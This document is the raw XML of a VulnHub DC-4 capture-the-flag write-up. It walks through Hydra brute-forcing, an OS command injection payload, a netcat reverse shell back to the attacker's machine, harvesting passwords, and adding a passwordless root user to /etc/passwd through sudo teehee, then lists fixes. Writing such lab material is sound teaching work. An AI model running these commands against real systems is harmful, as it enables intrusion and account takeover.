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C0392B"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:t xml:space="preserve">VULNHUB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CTF PENETRATION TEST WRITE-UP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="240"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr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Target Machine: DC-4  |  Difficulty: Beginner/Intermediate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ABB2B9"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Date: May 27, 2025  |  Author: Pavan Darade</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="1400"/>
      </w:pP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DC-4 presents a web admin panel with a command injection vulnerability. Exploitation provided initial shell access, followed by credential discovery in old backup files and privilege escalation using the teehee binary via sudo.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Machine Name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DC-4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VulnHub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(Debian 9)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/ Intermediate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Flags Captured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1  (Root Flag)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Root Access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Test Date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27, 2025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Tester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Pavan Darade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2. Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1  Port Scanning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nmap -sV -sC -p- 192.168.56.105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22/tcp  open  ssh     OpenSSH 7.4p1 Debian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80/tcp  open  http    nginx 1.13.12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2  Web Application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web application presented an admin login page. Hydra was used to brute-force the password.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hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.56.105 http-post-form "/login.php:username=^USER^&amp;password=^PASS^:S=logout"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host: 192.168.56.105  login: admin  password: happy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Exploitation — Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1  Identifying Command Injection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authenticated admin panel had a system command runner. User input was not sanitised, allowing OS command injection.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/command.php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radio=ls+-la;id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uid=33(www-data) gid=33(www-data)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2  Reverse Shell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netcat reverse shell was injected through the command runner.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nc -lvnp 4444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radio=ls;nc+-e+/bin/bash+192.168.56.101+4444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Connection received from 192.168.56.105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www-data@dc-4:~$ python3 -c 'import pty;pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1  Old Password File Discovery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find / -name '*.bak' -o -name '*old*' 2&gt;/dev/null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/home/jim/backups/old-passwords.bak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cat /home/jim/backups/old-passwords.bak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List of old passwords discovered</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2  SSH Brute-Force as jim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hydra -l jim -P old-passwords.bak ssh://192.168.56.105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login: jim  password: jibril04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ssh jim@192.168.56.105</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3  Mail Discovery — Lateral Movement to charles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cat /var/mail/jim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From: charles@dc-4  Password: ^xHhA&amp;hvim0y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su charles  # Password: ^xHhA&amp;hvim0y</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Privilege Escalation — teehee sudo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1  sudo -l Analysis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sudo -l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(root) NOPASSWD: /usr/bin/teehee</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2  Adding Root User via teehee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teehee is a custom binary that appends text to files. It was abused to add a new root-level user to /etc/passwd.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echo 'pavan::0:0:::/bin/bash' | sudo teehee -a /etc/passwd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su pavan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root@dc-4:~# id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uid=0(root) gid=0(root) groups=0(root)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FLAG: flag{exploits_are_easy...} — /root/flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Flag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30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Root Flag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/root/flag.txt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teehee sudo /etc/passwd injection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7. Vulnerability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14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OS Command Injection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Unsanitised input in admin command runner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sudo teehee Misconfiguration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NOPASSWD teehee allows /etc/passwd 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Weak Admin Password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Admin password brute-forced via Hydra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Sensitive File Exposure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Old passwords stored in world-readable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Cleartext Password in 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Password transmitted in plaintext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8.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Sanitise all user inputs — never pass untrusted data to shell commands.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teehee from sudoers or restrict it to non-privileged file paths.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or encrypt old password backup files and restrict file permissions.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encrypted communication (TLS) for all inter-user messages.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Enforce account lockout policies to prevent brute-force attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. Tools &amp;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Nmap, Hydra — Scanning and brute-force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GTFOBins — sudo teehee abuse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netcat — Reverse shell handler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VulnHub DC-4 — https://www.vulnhub.com/entry/dc-4,313/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10. Disclaimer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write-up was created solely for educational purposes as part of a CTF exercise on VulnHub. All testing was conducted in an isolated lab environment. Do not use these techniques against systems without explicit written authorisation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="C0392B" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="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ABB2B9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">End of Report — VulnHub DC-4 CTF Write-Up — Pavan Darade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4"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="ABB2B9"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Prepared by: Pavan Darade</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="ABB2B9"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">	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VulnHub DC-4 CTF Write-Up</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="ABB2B9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4" w:space="4"/>
      </w:pBdr>
      <w:spacing w:after="160" w:before="360"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="C039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922B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2026-05-27T13:49:20.707Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-27T13:49:20.707Z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